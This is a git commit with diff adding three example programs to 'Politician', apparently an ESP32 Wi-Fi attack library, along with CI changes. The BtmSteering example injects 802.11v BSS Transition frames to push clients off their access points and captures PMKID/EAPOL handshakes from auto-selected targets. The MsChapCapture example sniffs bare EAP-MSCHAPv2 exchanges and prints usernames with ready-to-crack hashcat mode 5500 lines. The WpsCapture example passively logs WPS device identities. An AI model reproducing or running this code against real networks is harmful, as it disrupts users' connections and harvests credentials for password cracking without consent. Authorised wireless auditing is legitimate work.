feat: exponential backoff, HE/VHT attack path, BTM/WPS/MSCHAPv2 examples

0ldev · 0ldev · commit c124ccf66b6e · 2026-05-30T13:38:45.000-03:00
Exponential backoff for failing targets:
- Per-entry retry window doubles with each failed attempt: base &lt;&lt; min(total_attempts, 4)
- Capped at 8 minutes; zero overhead in has_target mode (no throttle applied)
- Applies to PMKID fishing throttle in the beacon handler

HE/VHT-aware attack path selection:
- When PMF-Required + (is_he OR is_vht) is detected, ATTACK_CSA and ATTACK_DEAUTH
  are stripped from effMask before the attack block — injected management frames are
  MIC-protected on these networks and will be silently dropped by clients
- Same guard applied to the PMKID-&gt;CSA fallback path in tick()
- Falls through cleanly to PMKID_EXHAUSTED / BTM path

Examples:
- BtmSteering: 802.11v BTM + PMKID combination, AttackResultCb, targeting filter
- WpsCapture: passive WPS M1 sniffing with PoliticianWPS.h print helpers
- MsChapCapture: bare EAP-MSCHAPv2 harvest + hashcat -m 5500 output,
  compiles to no-op stub when POLITICIAN_NO_MSCHAPV2 is defined

CI:
- Matrix expanded to 15 examples (BtmSteering, MsChapCapture, WpsCapture added)
- hashFiles cache key fixed: was using matrix variable inside hashFiles() which
  GitHub Actions does not support; changed to **/platformio.ini glob
diff --git a/.github/workflows/build-examples.yml b/.github/workflows/build-examples.yml
@@ -26,6 +26,9 @@ jobs:
           - StressTest
           - TargetedAuditing
           - WigleIntegration
+          - BtmSteering
+          - MsChapCapture
+          - WpsCapture
 
     steps:
       - name: Checkout repository
@@ -43,7 +46,7 @@ jobs:
         uses: actions/cache@v4
         with:
           path: ~/.platformio
-          key: pio-${{ runner.os }}-${{ hashFiles('examples/${{ matrix.example }}/platformio.ini') }}
+          key: pio-${{ runner.os }}-${{ hashFiles('**/platformio.ini') }}
           restore-keys: pio-${{ runner.os }}-
 
       - name: Build ${{ matrix.example }}
diff --git a/examples/BtmSteering/platformio.ini b/examples/BtmSteering/platformio.ini
@@ -0,0 +1,6 @@
+[env:esp32_classic]
+platform = espressif32
+framework = arduino
+board = esp32dev
+monitor_speed = 115200
+lib_extra_dirs = ../../
diff --git a/examples/BtmSteering/src/main.cpp b/examples/BtmSteering/src/main.cpp
@@ -0,0 +1,107 @@
+/*
+ * BtmSteering.ino
+ *
+ * Demonstrates 802.11v BSS Transition Management (BTM) Request injection
+ * using the Politician library.
+ *
+ * BTM is a polite 802.11v frame that asks a client to roam to a different AP.
+ * Many modern clients (iOS, Android, Windows 11, macOS) honour BTM requests
+ * and disconnect voluntarily — triggering a fresh 4-way handshake on reconnect
+ * without sending a noisy Deauth or CSA beacon.
+ *
+ * This example:
+ *   1. Enables ATTACK_BTM alongside ATTACK_PMKID.
+ *   2. Sets a targeting policy that focuses on WPA2 APs with active clients.
+ *   3. Uses AttackResultCallback to log outcomes.
+ *
+ * BTM fires per connected STA immediately after an AP is selected as target.
+ * Combine with ATTACK_PMKID so that after the client roams, the PMKID fishing
+ * attempt is ready to capture the resulting EAPOL handshake.
+ *
+ * Config knobs:
+ *   cfg.btm_burst_count     — how many BTM frames to send per client (default 3)
+ *   cfg.btm_disassoc_timer  — Disassociation Timer field in TBTT units (default 10)
+ */
+
+#include <Arduino.h>
+#include <Politician.h>
+
+using namespace politician;
+
+Politician engine;
+
+// ─── Attack Result Callback ───────────────────────────────────────────────────
+
+void onAttackResult(const AttackResultRecord &r) {
+    const char *ssid = r.ssid_len > 0 ? r.ssid : "(hidden)";
+    switch (r.result) {
+        case RESULT_PMKID_EXHAUSTED:
+            Serial.printf("[-] PMKID exhausted for \"%s\"\n", ssid);
+            break;
+        case RESULT_CSA_EXPIRED:
+            Serial.printf("[-] CSA wait expired for \"%s\"\n", ssid);
+            break;
+        default:
+            break;
+    }
+}
+
+// ─── Handshake Callback ───────────────────────────────────────────────────────
+
+void onHandshake(const HandshakeRecord &rec) {
+    Serial.printf("\n[!] %s captured from \"%s\" (vendor: %s)\n",
+        rec.type == CAP_PMKID ? "PMKID" : "EAPOL",
+        rec.ssid,
+        Politician::getVendor(rec.bssid));
+}
+
+// ─── Targeting Filter ─────────────────────────────────────────────────────────
+// Only attack WPA2 APs that have at least one connected client visible.
+// BTM requires a known STA MAC — if no STA is seen, no BTM is sent anyway.
+
+bool targetFilter(const ApRecord &ap) {
+    if (ap.enc < 3)         return false; // Skip open/WEP
+    if (ap.rssi < -75)      return false; // Too far
+    if (ap.sta_count == 0)  return false; // No clients visible
+    return true;
+}
+
+// ─── Setup ───────────────────────────────────────────────────────────────────
+
+void setup() {
+    Serial.begin(115200);
+    delay(2000);
+    Serial.println("\n--- Politician: BTM Steering + PMKID Capture Example ---");
+    Serial.println("Using 802.11v BTM to trigger client reconnections...\n");
+
+    Config cfg;
+    cfg.smart_hopping      = true;
+    cfg.btm_burst_count    = 3;    // Send 3 BTM frames per client
+    cfg.btm_disassoc_timer = 10;   // 10 TBTTs (~102ms) before disassoc
+
+    if (engine.begin(cfg) != politician::OK) {
+        Serial.println("[ERROR] WiFi init failed!");
+        while (1) delay(100);
+    }
+
+    engine.setEapolCallback(onHandshake);
+    engine.setAttackResultCallback(onAttackResult);
+    engine.setTargetFilter(targetFilter);
+
+    // ATTACK_BTM: send polite BTM request to known clients
+    // ATTACK_PMKID: immediately start PMKID fishing when client reconnects
+    // ATTACK_PASSIVE: also capture natural reconnects on adjacent channels
+    engine.setAttackMask(ATTACK_BTM | ATTACK_PMKID | ATTACK_PASSIVE);
+
+    engine.setAutoTarget(true);    // Automatically move to next AP after capture
+    engine.setDisconnectionStrategy(STRATEGY_AUTO_FALLBACK);
+    engine.startHopping();
+
+    Serial.println("Engine started. Hunting for BTM-responsive clients...");
+}
+
+// ─── Loop ────────────────────────────────────────────────────────────────────
+
+void loop() {
+    engine.tick();
+}
diff --git a/examples/MsChapCapture/platformio.ini b/examples/MsChapCapture/platformio.ini
@@ -0,0 +1,6 @@
+[env:esp32_classic]
+platform = espressif32
+framework = arduino
+board = esp32dev
+monitor_speed = 115200
+lib_extra_dirs = ../../
diff --git a/examples/MsChapCapture/src/main.cpp b/examples/MsChapCapture/src/main.cpp
@@ -0,0 +1,132 @@
+/*
+ * MsChapCapture.ino
+ *
+ * Demonstrates passive bare EAP-MSCHAPv2 credential capture using the
+ * Politician library.
+ *
+ * EAP-MSCHAPv2 (RFC 2759) uses a challenge/response exchange:
+ *   AP   → Client  : 16-byte server challenge
+ *   Client → AP    : NT-Response (24 bytes) derived from NTLM hash + challenge
+ *
+ * When MSCHAPv2 runs bare (not inside a PEAP/TTLS TLS tunnel), both frames
+ * are in plaintext and can be passively sniffed. The NT-Response + challenge
+ * pair can be fed directly into hashcat mode 5500 (NetNTLMv1).
+ *
+ * NOTE: Bare MSCHAPv2 without an outer TLS tunnel is a network misconfiguration
+ * (RFC 2759 §9.3 explicitly warns against it). PEAP/TTLS MSCHAPv2 encrypts
+ * the inner exchange and is NOT capturable by this method.
+ *
+ * This example is disabled at compile time if POLITICIAN_NO_MSCHAPV2 is defined.
+ *
+ * Build flags (platformio.ini):
+ *   build_flags = -DPOLITICIAN_NO_MSCHAPV2   ; disables this feature entirely
+ */
+
+#include <Arduino.h>
+#include <Politician.h>
+
+using namespace politician;
+
+#ifndef POLITICIAN_NO_MSCHAPV2
+
+Politician engine;
+
+// ─── MSCHAPv2 Capture Callback ────────────────────────────────────────────────
+
+void onMsChap(const MsChapRecord &rec) {
+    Serial.println("\n╔══════════════════════════════════════════╗");
+    Serial.println("║    Bare EAP-MSCHAPv2 Pair Captured       ║");
+    Serial.println("╚══════════════════════════════════════════╝");
+
+    Serial.printf("  AP BSSID : %02X:%02X:%02X:%02X:%02X:%02X\n",
+        rec.bssid[0], rec.bssid[1], rec.bssid[2],
+        rec.bssid[3], rec.bssid[4], rec.bssid[5]);
+
+    Serial.printf("  STA MAC  : %02X:%02X:%02X:%02X:%02X:%02X\n",
+        rec.sta[0], rec.sta[1], rec.sta[2],
+        rec.sta[3], rec.sta[4], rec.sta[5]);
+
+    Serial.printf("  Username : %s\n", rec.username);
+
+    // Server challenge (from AP → Client, 16 bytes)
+    Serial.print("  Server Challenge: ");
+    for (int i = 0; i < 16; i++) Serial.printf("%02X", rec.server_challenge[i]);
+    Serial.println();
+
+    // NT-Response (from Client → AP, 24 bytes)
+    Serial.print("  NT-Response     : ");
+    for (int i = 0; i < 24; i++) Serial.printf("%02X", rec.nt_response[i]);
+    Serial.println();
+
+    // Peer challenge (from Client → AP, 16 bytes)
+    Serial.print("  Peer Challenge  : ");
+    for (int i = 0; i < 16; i++) Serial.printf("%02X", rec.peer_challenge[i]);
+    Serial.println();
+
+    // Print hashcat mode 5500 line for direct cracking
+    // Format: username::::peer_challenge:server_challenge:nt_response
+    Serial.println("\n  [hashcat -m 5500 format]");
+    Serial.printf("  %s::::", rec.username);
+    for (int i = 0; i < 16; i++) Serial.printf("%02X", rec.peer_challenge[i]);
+    Serial.print(":");
+    for (int i = 0; i < 16; i++) Serial.printf("%02X", rec.server_challenge[i]);
+    Serial.print(":");
+    for (int i = 0; i < 24; i++) Serial.printf("%02X", rec.nt_response[i]);
+    Serial.println("\n──────────────────────────────────────────────\n");
+}
+
+// ─── EAP Identity Callback (optional: log who's authenticating) ───────────────
+
+void onIdentity(const EapIdentityRecord &rec) {
+    Serial.printf("[EAP] Identity: \"%s\" from %02X:%02X:%02X:%02X:%02X:%02X\n",
+        rec.identity,
+        rec.client[0], rec.client[1], rec.client[2],
+        rec.client[3], rec.client[4], rec.client[5]);
+}
+
+// ─── Setup ───────────────────────────────────────────────────────────────────
+
+void setup() {
+    Serial.begin(115200);
+    delay(2000);
+    Serial.println("\n--- Politician: Bare EAP-MSCHAPv2 Capture Example ---");
+    Serial.println("Listening for unencapsulated MSCHAPv2 exchanges...\n");
+    Serial.println("NOTE: Only captures bare MSCHAPv2 (no PEAP/TTLS tunnel).");
+    Serial.println("      Tunneled MSCHAPv2 is encrypted and NOT captured here.\n");
+
+    Config cfg;
+    cfg.smart_hopping = true;
+
+    if (engine.begin(cfg) != politician::OK) {
+        Serial.println("[ERROR] WiFi init failed!");
+        while (1) delay(100);
+    }
+
+    engine.setIdentityCallback(onIdentity);
+    engine.setMsChapCallback(onMsChap);
+
+    // Passive only — just listen for EAP frames
+    engine.setAttackMask(ATTACK_PASSIVE);
+    engine.startHopping();
+
+    Serial.println("Hopper started. Listening for MSCHAPv2 exchanges...");
+}
+
+// ─── Loop ────────────────────────────────────────────────────────────────────
+
+void loop() {
+    engine.tick();
+}
+
+#else // POLITICIAN_NO_MSCHAPV2 defined
+
+void setup() {
+    Serial.begin(115200);
+    delay(2000);
+    Serial.println("MSCHAPv2 capture is disabled (POLITICIAN_NO_MSCHAPV2 defined).");
+    Serial.println("Remove the define from build_flags to enable this feature.");
+}
+
+void loop() {}
+
+#endif
diff --git a/examples/WpsCapture/platformio.ini b/examples/WpsCapture/platformio.ini
@@ -0,0 +1,6 @@
+[env:esp32_classic]
+platform = espressif32
+framework = arduino
+board = esp32dev
+monitor_speed = 115200
+lib_extra_dirs = ../../
diff --git a/examples/WpsCapture/src/main.cpp b/examples/WpsCapture/src/main.cpp
@@ -0,0 +1,106 @@
+/*
+ * WpsCapture.ino
+ *
+ * Demonstrates passive WPS M1 frame capture using the Politician library.
+ *
+ * When a WPS client (phone, laptop, printer) starts the WPS PIN/PBC exchange,
+ * it sends a WSC_MSG M1 frame containing its device identity: model name,
+ * manufacturer, UUID, and supported config methods (PBC, PIN, Display, etc.).
+ *
+ * This example:
+ *   1. Hops channels listening for beacon WPS IEs to identify WPS-enabled APs.
+ *   2. Registers a WPS callback — fired automatically when an M1 is sniffed.
+ *   3. Uses PoliticianWPS.h to pretty-print the captured record.
+ *
+ * No active injection is needed; WPS M1 is broadcast in the clear.
+ *
+ * Optional: include PoliticianWPS.h for the print<> helper and bitmask constants.
+ */
+
+#include <Arduino.h>
+#include <Politician.h>
+#include <PoliticianWPS.h>  // Optional: print helpers, devTypeCatStr, configMethodsStr
+
+using namespace politician;
+
+Politician engine;
+
+// ─── WPS M1 Callback ─────────────────────────────────────────────────────────
+
+void onWpsM1(const WpsRecord &rec) {
+    Serial.println("\n╔══════════════════════════════════════════╗");
+    Serial.println("║          WPS M1 Frame Captured           ║");
+    Serial.println("╚══════════════════════════════════════════╝");
+
+    // AP that hosted the WPS exchange
+    Serial.printf("  AP BSSID   : %02X:%02X:%02X:%02X:%02X:%02X\n",
+        rec.bssid[0], rec.bssid[1], rec.bssid[2],
+        rec.bssid[3], rec.bssid[4], rec.bssid[5]);
+
+    // Device attributes from the M1 TLVs
+    Serial.printf("  Manufacturer: %s\n", rec.manufacturer);
+    Serial.printf("  Model Name  : %s\n", rec.model_name);
+    Serial.printf("  Model Number: %s\n", rec.model_number);
+    Serial.printf("  Device Name : %s\n", rec.device_name);
+    Serial.printf("  Serial No.  : %s\n", rec.serial_number);
+
+    // Device type category/subcategory (human-readable via PoliticianWPS.h)
+    Serial.printf("  Device Type : 0x%04X / %s\n",
+        rec.primary_dev_type_cat,
+        PoliticianWPS::devTypeCatStr(rec.primary_dev_type_cat));
+
+    // Config methods bitmask (human-readable via PoliticianWPS.h)
+    Serial.printf("  Config Methods: 0x%04X (%s)\n",
+        rec.config_methods,
+        PoliticianWPS::configMethodsStr(rec.config_methods));
+
+    // Print full record via PoliticianWPS.h template
+    Serial.println("\n  [Full Record]");
+    PoliticianWPS::print(Serial, rec);
+
+    Serial.println("──────────────────────────────────────────────\n");
+}
+
+// ─── AP Found Callback (optional: log WPS-enabled APs as discovered) ─────────
+
+void onApFound(const ApRecord &ap) {
+    if (!ap.wps_enabled) return;
+    Serial.printf("[WPS] WPS-enabled AP found: \"%.*s\" %02X:%02X:%02X:%02X:%02X:%02X ch%d RSSI=%d\n",
+        ap.ssid_len, ap.ssid,
+        ap.bssid[0], ap.bssid[1], ap.bssid[2],
+        ap.bssid[3], ap.bssid[4], ap.bssid[5],
+        ap.channel, ap.rssi);
+}
+
+// ─── Setup ───────────────────────────────────────────────────────────────────
+
+void setup() {
+    Serial.begin(115200);
+    delay(2000);
+    Serial.println("\n--- Politician: WPS M1 Capture Example ---");
+    Serial.println("Listening for WPS enrollee exchanges...\n");
+
+    Config cfg;
+    cfg.smart_hopping          = true;  // Follow traffic — WPS is usually on a specific channel
+    cfg.probe_hidden_interval_ms = 0;   // No need to probe hidden APs for this task
+
+    if (engine.begin(cfg) != politician::OK) {
+        Serial.println("[ERROR] WiFi init failed!");
+        while (1) delay(100);
+    }
+
+    engine.setApFoundCallback(onApFound);
+    engine.setWpsCallback(onWpsM1);
+
+    // Passive-only: no active attacks needed
+    engine.setAttackMask(ATTACK_PASSIVE);
+    engine.startHopping();
+
+    Serial.println("Hopper started. Waiting for WPS M1 frames...");
+}
+
+// ─── Loop ────────────────────────────────────────────────────────────────────
+
+void loop() {
+    engine.tick();
+}
diff --git a/src/Politician.cpp b/src/Politician.cpp
